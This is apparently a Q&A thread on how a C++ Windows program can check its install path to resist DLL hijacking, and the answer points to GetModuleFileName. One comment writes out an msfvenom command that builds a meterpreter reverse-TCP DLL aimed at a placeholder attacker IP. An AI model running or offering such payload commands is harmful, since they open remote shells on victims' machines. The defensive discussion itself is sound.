# How to make a specific program run from the installed path only to avoid DLL hijacking

Tags: c++, windows, dll

I have an executable which is linked with some dll files. To avoid DLL hijacking I am installing that application in a protected path (say C:\Program Files) where only the admin have "create" or "write" permissions.

Still some attacker can copy the entire installation folder to some other directory and able to craft a written function with the same name to perform malicious act such as deleting a file or modifying registry settings. The .DLL files will run on the same privileges as given to the running application.

I need to verify that my application is running only from the installed path..How can I make to possible using C++ ..

Comment: Look at `GetModuleFileName()`. The EXE can retrieve the path it is running from, and then validate it as needed

Comment: Why would a user go to that trouble when they could just do malicious things themselves? This seems like a non-solution.

Comment: I am following secure practices. I need to make sure that no intruders can false inject any dll s and monitor my application traffic and send false data to the backend

Comment: @KethiriSundar this does nothing to prevent injecting DLLs into your process, or hijacking your own DLLs, or deleting files, or modifying registry settings. Wait, are you mitigating against malicious USERS or malicious SOFTWARE? Re: malicious users, you cannot ever trust what clients send to the server. Security must be enforced on the server, period.

Comment: @tenfour actually If I place the DLL in a restricted directory , a malicious user can't hijack my dll s. I have security enforcement on the server side as well. we can create a malicious .DLL using metasploit's msfvenom: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT/8800] -f dll > [Path/"/root/Desktop/malicious.dll] and create a listner and listen to the traffic. I am having secure messaging algorithms and doing verification at the server side.But he can alter the message and create undesired scenarios in the backend.

Answer (score 1):

Look at [`GetModuleFileName`](https://msdn.microsoft.com/en-us/library/windows/desktop/ms683197(v=vs.85).aspx) to check where modules are located.